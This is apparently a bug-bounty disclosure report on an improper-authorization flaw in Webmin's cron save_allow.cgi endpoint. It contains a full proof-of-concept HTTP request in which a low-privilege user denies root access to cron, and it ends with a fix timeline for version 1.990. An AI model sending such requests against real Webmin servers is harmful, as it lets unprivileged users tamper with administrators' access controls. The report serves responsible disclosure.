Improper Authorization in webmin/webmin


Reported on

Feb 17th 2022


The /cron/save_allow.cgi endpoint is accessible to any authenticated low privilege users resulting in controlling user access to cron jobs. They could allow and deny other users access to cron jobs affecting the Scheduled Cron Jobs module.

Proof of Concept

Affected Endpoint:

GET http://{HOST}/cron/save_allow.cgi



*** This example request to deny root to access cron.

GET /cron/save_allow.cgi?allow=&mode=2&deny=root HTTP/1.1
Host: jumphost:10000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0
Accept: text/html, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-no-links: 1
X-PJAX: true
X-PJAX-Container: [data-dcontainer]
X-PJAX-URL: save_allow.cgi
X-Requested-With: XMLHttpRequest
DNT: 1
Connection: close
Referer: http://jumphost:10000/cron/edit_allow.cgi?xnavigation=1
Cookie: redirect=1; testing=1; sid=092a4f34132757770ba9c9c353760197


This vulnerability is capable of modifying or restricting access to a system function outside the user's limits.

We are processing your report and will contact the webmin team within 24 hours. a year ago
We have contacted a member of the webmin team and are waiting to hear back a year ago
webmin validated this vulnerability a year ago
Faisal Fs ⚔️ has been awarded the disclosure bounty
The fix bounty is now up for grabs
webmin marked this as fixed in 1.990 with commit eeeea3 a year ago
The fix bounty has been dropped
This vulnerability will not receive a CVE
save_allow.cgi#L5-L17 has been validated
to join this conversation